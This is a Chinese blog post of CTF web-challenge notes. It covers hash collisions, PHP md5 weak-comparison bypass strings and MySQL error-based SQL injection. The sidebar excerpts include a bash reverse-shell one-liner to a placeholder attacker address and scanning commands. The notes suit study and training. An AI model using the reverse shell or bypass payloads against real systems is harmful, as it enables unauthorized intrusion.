做题小结-web

最新推荐文章于 2022-03-22 01:50:08 发布
最新推荐文章于 2022-03-22 01:50:08 发布
阅读量139 收藏
点赞数 2
分类专栏: CTF专题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57497184/article/details/119187095
版权

做题小结-WEB

hash碰撞

  1. 什么是哈希碰撞

    哈希(hash),就是将不同的输入映射成独一无二的、固定长度的值(又称"哈希值")。它是最常见的软件运算之一。如果不同的输入得到了同一个哈希值,就发生了"哈希碰撞"。如果两个不同的用户,得到了同样的 token,就发生了哈希碰撞。服务器将把这两个用户视为同一个人,这意味着,用户 B 可以读取和更改用户 A 的信息。

  2. 怎样防止哈希碰撞

    扩大hash值的取值空间,16个二进制位的哈希值,产生碰撞的可能性是 65536 分之一。也就是说,如果有65537个用户,就一定会产生碰撞。哈希值的长度扩大到32个二进制位,碰撞的可能性就会下降到 4,294,967,296 分之一。更长的哈希值意味着更大的存储空间、更多的计算,将影响性能和成本。

  3. 哈希碰撞的概率

    • 取值空间的大小(即哈希值的长度)
    • 整个生命周期中,哈希值的计算次数

md5函数漏洞

$str1 = $_GET['str1'];`
 `$str2 = $_GET['str2'];`
 `if (md5($str1) == md5($str2)){`
 `die('OK'); }

php弱类型比较产生的漏洞

  • 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过

    md5值以0e开头的字符串:

    • QNKCDZO
    • 240610708
    • s878926199a
    • s155964671a
    • s214587387a

    md5和双md5都是以0e开头的字符串:

    • CbDLytmyGm2xQyaLNhWn
    • 770hQgrBOjrcqftrlaZk
    • 7r4lGXCH2Ksu2JNT3BYM

有关proc目录的知识

https://www.cnblogs.com/liushui-sky/p/9354536.html

SQL注入总结

1.利用到的mysql函数

  • extractvalue()

    语法:extractvalue(xml文档,xml路径)

    原理:函数第二个参数 xml路径是可操作的地方,xml路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

  • updatexml()

    语法:updatexml(目标xml文档,xml路径,更新的内容)
    原理:和上面一致,要是xml路径报错就会出现我们需要查询的内容

报错注入

四种报错注入:Insert注入、Update注入、Delete注入、Limit注入

Insert注入

对用户注册这种输入框进行注入,sql语句执行后会报错,显示要查询的内容

Update注入

对修改密码这类的输入框

Delete注入

对信息删除类型输入框

Limit注入
YKingH
关注
专栏目录
华为面试题小结
03-21
这样做的好处是可以降低代码之间的耦合度,提高代码的复用性和可维护性。 #### AOP (Aspect Oriented Programming) AOP(面向切面编程)是一种编程思想,它将那些横切关注点的功能从业务逻辑中解耦出来,形成独立的...
【超全总结】CTF常见的MD5绕过漏洞和应对方法
M0nH1N的博客
08-06 6318
$str1 = $_GET['str1'];$str2 = $_GET['str2'];if (md5($str1) == md5($str2)){die('OK'); } php弱类型比较产生的漏洞 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过 有一些字符串的MD5值为0e开头,这里记录一下 QNKCDZO 240610708 s878926199a s155964671a s2145
前端大厂最新面试题-slot.docx
最新发布
06-06
小结:Slot 是一个非常重要的概念在前端开发中,它可以让用户可以拓展组件,去更好地复用组件和对其做定制化处理。通过使用 Slot,可以让父组件在使用子组件时,可以更加灵活地传递内容,完成复用组件在不同场景的...
2021-2022计算机二级等级考试试题及答案No.10730.docx
10-25
**题目:** 如果某二叉树中有n个度为2的结点,则该二叉树中的叶子结点数是多少? **选项:** A. n+1 B. n-1 C. 2n D. n/2 **正确答案:** A **解析:** 对于任何二叉树而言,叶子节点的数量总是比度为2的节点数量...
进入IT企业必读的200个+.NET面试题.pdf )
05-14
**2.5 小结** - 本章概述了.NET框架的基础概念和技术细节,包括CTS、CLS、CLR、程序集、应用程序域等重要概念,以及.NET的运行机制、程序集的生成和部署等方面的知识。 #### 第3章 .NET类型语法基础 **3.1 基础...
2021-2022计算机二级等级考试试题及答案No.19215.docx
10-31
14. 二叉树节点计算:对于二叉树,总结点数等于叶子结点数+度为1的结点数+1,所以70+80+1=151,但答案是A,可能是题目描述有误。 15. 公式自动填充:这是电子表格软件如Excel的功能,用于快速复制公式到相邻单元格...
ctfshow-php特性
YkingH的博客
01-26 5994
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
[网鼎杯 2020 朱雀组]phpweb-反弹shell
YkingH的博客
03-10 5463
[网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.php中两个参数,通过对参数的修改,发现用到了call_user_func()函数 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sXIyF4mu-1646878901483)(D:\Blog\做题题解[网鼎杯 2020 朱雀组]phpweb\image-2022030920444
php反序列化--字符串逃逸
YkingH的博客
03-14 5137
php反序列化–字符串逃逸 PHP反序列化的字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
php session 反序列化
YkingH的博客
03-22 3901
php_session 反序列化 php 存储session的三种模式 php_serialize 经过serialize()函数序列化数组 php 键名+|+经过serialize()序列化处理后的值 php_binary 键名长度对应ASCII字符+键名+serialize()序列化的值 三种存储模式的区别 <?php ini_set("session.serialize_handler", "php"); //修改session存储类型为php类型 //ini_
ctfshow-命令执行
YkingH的博客
01-28 3896
命令执行 命令执行常见做题姿势 *或?代替文件名全拼 用其它的命令执行函数代替被过滤的函数 用已知参数传入另一个无限制参数,构造木马 编码绕过 include 不用括号 分号可用?>代替 cat替换 内部字段分隔符$IFS grep 通配符匹配 无字母数字的webshell $(( ))与整数运算 脚本 复制重命名绕过 fopen 路径读取 文件高亮 文件包含 exit() mysql load_file读取文件 命令接口 等等 web29 error_reporting(0); if
XSS跨站之原理分类及攻击手法
YkingH的博客
11-09 3648
web-xss跨站之原理分类及攻击手法 XSS简介 跨站脚本攻击(Cross Site Script),为和层叠样式表区分,安全领域叫做“XSS”。 XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在浏览网页时控制用户浏览器的一种攻击。一开始攻击的演示示例是跨域的,而现在由于JavaScript的强大功能以及网站前端应用的复杂化,是否跨域已经不重要。 XSS原理解析 攻击者通过向web页面中注入JavaScript代码(或者ActionScript、VBScript),来获取用户的
[CISCN2019 华北赛区 Day1 Web2]ikun
YkingH的博客
03-19 3576
[CISCN2019 华北赛区 Day1 Web2]ikun buu题目复现 页面提示,一定要买到Lv6,查找几页,找不到Lv6的存在,尝试通过脚本爆破Lv6 import requests url = 'http://57043135-ce0e-4b77-bcac-cd45e975d6f7.node4.buuoj.cn:81/shop?page=' for i in range(1,1000): url = 'http://57043135-ce0e-4b77-bcac-cd45e975d6f7.
ctfshow 爆破 web21-web28
YkingH的博客
01-29 2521
爆破 爆破考察手段 burp intruder的使用 编写脚本寻找满足条件的解 伪随机 web21 burp抓包,发送到intruder模块,利用题中给出的脚本进行爆破,注意通过payload加工模块进行payload加工,采用base64编码。在返回的数据包中查找长度即可 web22 环境进不去,直接提交flag web23 利用给出的php脚本,进行进一步加工,爆破出满足条件的token <?php for($a=0;$a<10;$a++){ for($b=0;$b<10;$b
Linux下反弹shell的原理
YkingH的博客
03-10 1463
Linux下反弹shell的原理-bash shell是一种脚本语言,需要用解释器来解析这些脚本,常见的脚本解释器有: bash-Linux标准默认的shell sh-Unix标准默认的shell shell是Linux的外壳,为用户和内核之间的交互提供了一个接口 反弹shell就是控制端监听在某TCP端口,别控端发起请求到该端口,并将其命令行的输入输出转到控制端 bash建立反弹shell bash -i >& /dev/tcp/攻击端IP/攻击端监听端口 0>&1 bash
web文件包含
YkingH的博客
10-07 1373
文件包含 文件包含漏洞原理 文件包含:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用过程,称为文件包含。 文件包含漏洞:为使代码更加灵活,会将包含的文件设置为变量,用来进行动态调用,漏洞产生的原因正是函数通过变量引入文件时,没有对传入的文件名进行合理的校验,从而操作了意想之外的文件,导致文件泄露甚至恶意代码注入。 PHP: include(), include_once(), require(), require_once(), fopen(),
ctfshow 文件上传
YkingH的博客
02-02 1302
以ctfshow刷题平台为例介绍CTF比赛中文件上传的常见姿势
ctf—SQL注入(post)
YkingH的博客
07-07 1146
ctf—SQL注入(post) SQL注入漏洞介绍 ​ sql注入攻击指用用户构建特殊的输入作为参数传入web应用程序,通过执行sql语句,而执行攻击者所要的操作,主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 ​ 任何一个用户可以输入的位置都可以是注入点。比如url中,以及http报文中,post传递的参数 1.信息探测 扫描主机开放的全部端口 nmap -T4 -p -靶场IP 快速扫描主机全部信息 nmap -T4 -A -v 靶场IP 探测敏感信息 nikto -host ht
CTF—文件
YkingH的博客
07-08 991
CTF—文件包含 文件包含漏洞 定义:在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入 危险函数 include() include_once() require() require_once() 解题思路 本地文件包含:直接读取目标机上的Flag文件 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看flag文件 php.ini allow_url_fopen = on/off 允许ur
亲测有效的stable-diffusion-webui安装指南
Stable Diffusion Web UI 安装包指的是包含所有必要文件和配置的压缩文件包,用户通过下载并安装该文件包,即可在本地部署Stable Diffusion模型的Web UI版本。" 知识点详细说明: 1. Stable Diffusion模型: - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值